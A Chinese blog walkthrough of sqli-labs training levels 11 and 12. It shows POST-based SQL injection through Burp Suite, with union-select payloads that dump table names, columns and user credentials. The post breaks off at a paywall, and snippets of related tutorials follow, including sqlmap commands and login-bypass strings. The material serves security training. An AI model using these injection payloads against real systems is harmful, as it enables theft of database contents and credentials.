【渗透测试】sqli-labs闯关(11-17)

已于 2022-07-27 08:30:06 修改
阅读量775 收藏 6
点赞数 2
分类专栏: 渗透测试 文章标签: 安全 sql
于 2020-04-21 19:03:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43168364/article/details/105650210
版权
本文详细介绍了sqli-labs的11至17关的渗透测试过程,涉及POST型的单引号、双引号加小括号的SQL注入点,以及无法使用联合查询时的XPath报错注入和延时注入方法,展示了不同闭合方式下的SQL注入攻击技巧。
摘要由CSDN通过智能技术生成

第十一关:POST型的单引号报错注入点

方法:联合查询
输入用户名密码,打开bp进行抓包。
在这里插入图片描述
将抓到的包发送到repeater模块
在这里插入图片描述
首先猜测注入点在用户名上,判断闭合的方式是单引号,还是其他的。用单引号闭合时回显正常。
在这里插入图片描述
用双引号闭合时没用,回显,可知是用单引号闭合的。
在这里插入图片描述
判断列数
在这里插入图片描述
在这里插入图片描述
可知有两列,接下来我们就可用联合查询了。判断联合查询的回显是否正常。
在这里插入图片描述
接下来得到表名,语法:dumb' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+.
在这里插入图片描述
然后爆出字段名,语法:dumb' and 1=2 union select 1,group(column_name) from information_schema.columns where table_schema=database() and table_name="users" --+
在这里插入图片描述
最后爆出详细的数据,语法:dumb' and 1=2 union select 1,group_concat(username,"-",password) from users --+
在这里插入图片描述

第十二关:POST型的双引号加小括号的注入点

方法:联合查询
登录进行抓包
在这里插入图片描述
注入点在用户名上,判断他的闭合方式
在这里插入图片描述
单引号没有回显,说明闭合的方式不是单引号,我们试试双引号,回显语法错误,根据之前的经验,我们判断这里可能有小括号.

最低0.47元/天 解锁文章
通地塔
关注
专栏目录
sqlmap过SQLi-LABS靶场 11-20关
小明师傅博客
06-05 3731
11关 后面基本都是post注入了 不过我们用的是神器sqlmap 我们先随便输入,然后bp抓包 把抓到的包保存问txt格式 然后在sqlmap 指定他 用 -r sqlmap.py -r "C:\Users\Administrator\Desktop\post.txt" --leve=5 --sisk=3 --dbs 全部就扫出来啦 第12关 一模一样 第13关 多了两条,要用空值测试,线程默认10跑这个速度好慢 然后也是一模一样 14关 一模一样 15关 一模一样 16关-20关 都
从零开始的sqli-labs:十一关
asdushf的博客
12-12 757
sqli-labs第十一关 文章目录sqli-labs第十一关前言判断注入类型 前言 十一关开始出现登录框了 判断注入类型 这里注入类型的判断和前面差不太多,关键还是要注意引号的闭合。 上下两边都输入1,发现登录失败上边输入 ...
sqli-labs-----第11
wyzhxhn的博客
11-09 1890
基于错误的POST型单引号字符型注入
sqli-labs(11-15)关通关讲解
最新发布
weixin_53736204的博客
07-28 415
此关以POST传入,使用报错注入。
sqli-labs第十一关
小人物的博客
06-10 4409
less11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入) 第十一关开始进入登录框这种模式,像登陆框这种模式也是可以当成sql语句注入的,你想想啊,它动态的页面,通过post传递值,然后再将post的值写到sql语句中,按照这个想法,那是不是万能注入也能使呢? 试一试。万能注入的语法为“ ‘or ‘1’ = ...
sqli-labs基础篇 第11~17
Lucky小小吴的小屋
01-23 1429
sqli-labs基础篇 第11~17
渗透测试sqli-labs闯关(18-24)
qq_43168364的博客
08-22 923
第十八关:user-agent单引号字符型注入点 方法:在user-agent上进行xpath报错注入 这一关我们输入用户名和密码之后给我们回显除了user-agent的信息,我们猜想注入应当是发生在user-agent上的。我们首先看看源代码。 果然这里把user-agent插入了数据库,我们只需要闭合$uagent前后的单引号然后写上注入语句即可。我们首先得到表名,语法:' and ext......
渗透测试sqli-labs闯关(1-10)
qq_43168364的博客
04-20 563
第一关
sqli-labs-master前10关
07-28
- *1* [【渗透测试sqli-labs闯关(1-10)](https://blog.csdn.net/qq_43168364/article/details/105496598)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
sqli dumb闯关
07-28
- *1* *2* *3* [【渗透测试sqli-labs闯关(11-17)](https://blog.csdn.net/qq_43168364/article/details/105650210)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
sqli-labs11-22关闯关心得与思路
m0_48294281的博客
03-28 4082
sqli-labs11-22关闯关心得与思路
sqli-labs靶场第十一关
gou1791241251的博客
12-27 1350
进入页面后发现是登录框,所以可以尝试一下万能密码或账号,但是万能密码也是需要判断注入闭合方式的,所以与我们之前所做过的盲注是一样的。 由此页面可以看出闭合方式是单引号,所以我们可以使用布尔盲注来进行获取信息啦。。 此时看到显示结果太多了,多于1个,所以可以用limit 0,1来进行获取第一个信息 这里也是可以使用报错注入的哦。。 比如这个xpath报错注入 以下就不在展示信息获取的步骤啦 ...
sqli-labs 第十一关
weixin_67813445的博客
02-16 325
11关出现登录框,发现是基于post进行的注入,我们可以用burrp suit来进行抓包,也可以选用hackbar的post方式
sqli-labs第十一和十二关(post请求爆库)
qq_42266432的博客
08-23 615
第十一关开始,有输入框了,先往里面分别填入两个1看看 页面回显了"尝试登录失败"并且在上面url中并未发现路径后面有提交的参数,说明这不是get请求了,打开hackbar,loadURL发现是以表单方式提交的post请求(刚开始准备使用burp抓包来看请求,结果burp抓取不到本地包就很迷)到这里就可以尝试开始注入了 如上图,uname加上单引号,想要的东西就回显出来了 在将uname变为1’ or 1,上图这个sql报错可以猜出sql的条件目前是uname=‘1’ or 1’ and passwor
sql注入第11
qq_45751902的博客
03-14 4029
这关采用post的方式传参 定闭合符 使用’ or 1=1 # 回显正常 使用" or 1=1 #,回显报错(可以尝试更多的闭合符,这里就不一一实现了) 实现原理 查询列数 ’ order by 2 # ’ order by 3 # 所以有两列 找显示位 查数据库名 'union select 1,database()# 查表名 ' union select 1,group_concat(table_name) from information_schema.tables where tab
sqli-labs第十一关、第十二关
qq_51366383的博客
12-07 441
从第十一关开始需要使用bp,我这里的都是用的repeater操作的。 判断闭合符 uname=admin’ --+&passwd=admin&submit=Submit 通过下面的对比可以看到这个是有回显出来的 uname=admin" --+&passwd=admin&submit=Submit 判断列数 uname=admin’ order by 2 --+&passwd=admin&submit=Submit 判断回显位 uname=admin’
sqli-labs(11-22关)
剁椒鱼头没剁椒的博客
10-10 1724
【代码】sqli-labs(11-22关)
sqli-labs闯关
10-09
很高兴为您解答关于sqli-labs闯关的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个关卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯关,您可以按照以下步骤进行: 1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值